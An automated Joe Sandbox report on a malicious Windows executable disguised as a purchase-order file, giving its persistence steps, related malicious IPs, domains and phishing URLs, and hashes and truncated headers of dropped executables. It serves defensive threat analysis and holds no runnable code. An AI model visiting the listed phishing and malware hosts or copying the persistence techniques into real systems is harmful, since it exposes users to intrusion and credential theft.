18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582674
Start date and time:	2024-12-31 09:04:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO_2024_056209_MQ04865_ENQ_1045.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@38/153@40/18
EGA Information:	Successful, ratio: 91.7%
HCA Information:	Successful, ratio: 84% Number of executed functions: 268 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Trading_AIBot.exe, PID 3448 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:05:02	API Interceptor	1x Sleep call for process: PO_2024_056209_MQ04865_ENQ_1045.exe modified
03:05:04	API Interceptor	75x Sleep call for process: powershell.exe modified
03:05:07	API Interceptor	32x Sleep call for process: alg.exe modified
03:05:18	API Interceptor	5x Sleep call for process: zeXKjViL.exe modified
03:05:51	API Interceptor	993x Sleep call for process: apihost.exe modified
08:05:04	Task Scheduler	Run new task: zeXKjViL path: C:\Users\user\AppData\Roaming\zeXKjViL.exe
08:05:09	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
08:05:11	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
13.248.148.254	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
	http://begantotireo.xyz	Get hash	malicious	Unknown	Browse	ww38.begantotireo.xyz/favicon.ico
	http://begantotireo.xyz	Get hash	malicious	Unknown	Browse	ww38.begantotireo.xyz/favicon.ico
	http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20Lutheran	Get hash	malicious	Unknown	Browse	ww38.watchdogsecurity.online/favicon.ico
	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Get hash	malicious	Bdaejec, Socelars	Browse	ww12.icodeps.com/?usid=26&utid=7334446481
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	ww38.fmoovies.to/
	http://www.multipool.us	Get hash	malicious	Unknown	Browse	ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
	http://pollyfill.io	Get hash	malicious	Unknown	Browse	ww38.pollyfill.io/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jpskm.biz	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	18.246.231.120
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.246.231.120
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	34.211.97.45
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	34.211.97.45
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	34.211.97.45
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	34.211.97.45
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	34.211.97.45
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	34.211.97.45
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	34.211.97.45
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	34.211.97.45
oshhkdluh.biz	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	54.244.188.177
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	54.244.188.177
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	54.244.188.177
76899.bodis.com	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	199.59.243.227
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	199.59.243.227
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://bonalluterser.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	file.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc, Xmrig	Browse	199.59.243.225
	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	199.59.243.225
	xPUqa4qbDL.js	Get hash	malicious	Unknown	Browse	199.59.242.153

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
AMAZON-AESUS	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	44.199.56.69
	Set-up.exe	Get hash	malicious	Unknown	Browse	52.202.253.164
	kwari.mips.elf	Get hash	malicious	Unknown	Browse	54.226.65.111
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857	Get hash	malicious	KnowBe4	Browse	3.88.121.169
	securedoc_20241220T111852.html	Get hash	malicious	Unknown	Browse	44.219.110.92
	https://visa-pwr.com/	Get hash	malicious	Unknown	Browse	3.208.228.173
	botx.mips.elf	Get hash	malicious	Mirai	Browse	52.0.196.218
	botx.x86.elf	Get hash	malicious	Mirai	Browse	34.206.198.108
AMAZON-02US	25F.tmp.exe	Get hash	malicious	Darkbot	Browse	18.244.18.38
	chernobyl.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.171.230.55
	DIS_37745672.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	34.241.139.243
	ARMV7L.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	systempreter.exe	Get hash	malicious	AsyncRAT	Browse	3.69.157.220
	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	13.32.99.103
	rjnven64.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	18.245.31.129
	Epsilon.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	34.249.145.219

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	HALKBANK EKSTRE.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	EPIRTURMEROOO0060.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1353216
Entropy (8bit):	5.3243783935455875
Encrypted:	false
SSDEEP:	12288:3C4VQjGARQNhixXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:3OCAR0ixsqjnhMgeiCl7G0nehbGZpbD
MD5:	B51557B7A9F166D7BF857730D65E08D3
SHA1:	1D25A37FFB5A6EFF93B94059ABDCC1C2C8103F17
SHA-256:	6C7E3C401957A4BF61E17AB3E7F49F344E9E7968AF6D5E555EA9E7841956CA64
SHA-512:	8CF9171F9357D32B614EA8086F6D512A76FC3FF8FF24CD2399335BC918843B5E946FEF1D6B6192A2F488A4AA826C56A7386296147575D933DB5A60600A8A39A5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....A.......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1294848
Entropy (8bit):	5.2826917412348
Encrypted:	false
SSDEEP:	12288:ENUpaKghKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ECMKg4sqjnhMgeiCl7G0nehbGZpbD
MD5:	28C24747652CD266E161AB628D35BE9D
SHA1:	9DE9B5B066DB850911D3B1B4334F0489317A563A
SHA-256:	CE4748FB13910E917B22E0A3BA0A2C1406848D429283F5424D50F591AC39A53E
SHA-512:	699B559A2CA178B511ACF8FDF5BD8884F04BACD18F3BEDB25888C3B61CAD37823A5C3B1DA0C44CE264519E3C4924F6A861E24AD909BC993EA2EB04A335DB5666
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314304
Entropy (8bit):	5.274131544052398
Encrypted:	false
SSDEEP:	12288:9MEhwdbT9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7KdH9sqjnhMgeiCl7G0nehbGZpbD
MD5:	815B2CB2DA48F77E0B0C22B2EA859BFB
SHA1:	8285F5B21F363B600DAA2049958C207E7BFED9A9
SHA-256:	267F6294917B66B019512BA89B61F0A2657879314A3115B1CB6ABA87E5C044F0
SHA-512:	2302B5643097A74A62A4F4F1F2F67A7447C5EFC26598D8EEA6278310A74C00129F1931CA144B26842C0E6C62E75BACF8A10853202535A4293BF956D91EE6044B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.647025538647812
Encrypted:	false
SSDEEP:	49152:1K0eqkSR7Xgo4TiRPnLWvJZDmg27RnWGj:1K0pR7Xn4TiRCvJZD527BWG
MD5:	9BDF8C2D8537333CB1A57824C9BFBFCA
SHA1:	2942EBFA5DA987889E5CFB5B4A26B94A4C5A848C
SHA-256:	C756FC4DFC1542C2A8795D6B2C878E7C234266F5BE40E4B46E190B11FA0A51ED
SHA-512:	C44ACBDC9E063D6563FEB7648A7FBFC63B4B007387F7C1660B74A64BD652DACD20E0D91199B7FB38DE92D7A04B090CAA5E83D890EB3B1363FCD3723DA394C326
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......v"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.565047176470713
Encrypted:	false
SSDEEP:	49152:AfYP1JsEDkSR7Xgo4TiRPnLWvJZDmg27RnWGj:QYPBR7Xn4TiRCvJZD527BWG
MD5:	E1791F81FCDC3B734745D5C56EB688DB
SHA1:	EE8A6C49B6AA3F3C1A79A1181862B6147369B607
SHA-256:	D21285BF7EDADC05E5134E4E306AA249AE6E1FB87C9A324D295D7322FF49FFA8
SHA-512:	952FB95C2540DD1AE00F67A02C5E99EE1987B0647ADA8C01337F4F587E2F4C2ABDEB63FDB55E8C67E659F4D596FE5BA2E50A006886A743B8ECAF52CD5DFB904E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245184
Entropy (8bit):	5.123559268796299
Encrypted:	false
SSDEEP:	12288:W62SYUcknnXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:rYUcknXsqjnhMgeiCl7G0nehbGZpbD
MD5:	0F8BF28FC502AF52D68F01E061884ED5
SHA1:	78526E26EFAF743A528D09E508AE73656533660E
SHA-256:	E939A88B78211EEA1BF61CE0A1411A193BAFEA707F0B087E7896E75B0172B0D1
SHA-512:	570CB43F9FBF8651363ABC9CD240BDA311223F7777110CF61FEE2A24381DD0370B432E94E93371A2F708A41377EDA58826F6F90EAD49A1EC3DAE516AB4E6E978
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@...............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.1666554275631595
Encrypted:	false
SSDEEP:	49152:9+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSdDmg27RnWGj:PSktbprD527BWG
MD5:	25A463CE5F86688F024BBE26A7774DDD
SHA1:	2959C508D2AF90852DBF3FD1817E9E97C7B62E8E
SHA-256:	A2C1B33947E62D26DDBC371564EFEC9B1823BFB18638F53735909134D693A7A5
SHA-512:	F041A8957F3CD344FDFCDA1B8CB065AA3AB28FB9F02B47171DC7ADC29F0602C4489C0BC0B8503E8CD1ECDCB01B70EA998318F70A651A5217F07A1A5E85B2B8ED
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.094618163404869
Encrypted:	false
SSDEEP:	49152:cGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLWDmg27RnWGj:c4OEtwiICvYMRf2D527BWG
MD5:	2805CDDE7E1B60FEEB0D1E7AA9E9BC69
SHA1:	4B9B31ADA6B5572E9C6656C7CA9FE45ED45C4A8F
SHA-256:	323CAC74F3FF897F1F3FBF766CF5FCB74147D8CBE6B833BB6FA135EDFF850A92
SHA-512:	BCBD7C7741AA104C14190295318ABF97CEF7BB7B9440B439C0F7B14848305D837005DAC0338E645E82AEC63E2EC9D3A1410218E364A9CE54CCDDE20CDBC10512
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1485824
Entropy (8bit):	5.496385499580529
Encrypted:	false
SSDEEP:	24576:NAMuR+3kMbVjhBsqjnhMgeiCl7G0nehbGZpbD:6D+lbVjhVDmg27RnWGj
MD5:	EE0B02409EE8EF085D840476424601BF
SHA1:	42EA08C65F3175594AF815D8D2FA1EC4411DCA59
SHA-256:	2B7C37E1067C255CDEED5F376E00E10B615F8976EFD032A17D8F6F16555B571A
SHA-512:	C081338FAFDC03FF86B6654BC34D5202DF2C73255DBBD2D0D84101BA26CAB08351E12ECE4E094C8A7A9C63E6F9A410A3BDA10B7815B0E34188770EDDA37D40E7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.27776448480496
Encrypted:	false
SSDEEP:	12288:MImGUcsvZZdubv7hfl3CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:MxGBcmlysqjnhMgeiCl7G0nehbGZpbD
MD5:	72BA8A03C7C6EFEED1AD022BBE6E4CAE
SHA1:	F9EC75AE7C08E02810BFEF41D36752500393BDB4
SHA-256:	1C6AC91D5386673E5051ED18A938F1312EB9307929DEC1892B2ACFD3E8099071
SHA-512:	52D7B6366362E5E2B99D4AD46B9072299B2095398F0DA37465AFCC8597299A841E2FD0AD39BDD24D8149ADA4E65C5E020C63B752D669FCD0B6AE03B10305989B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................g!......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1644544
Entropy (8bit):	5.6947966682590945
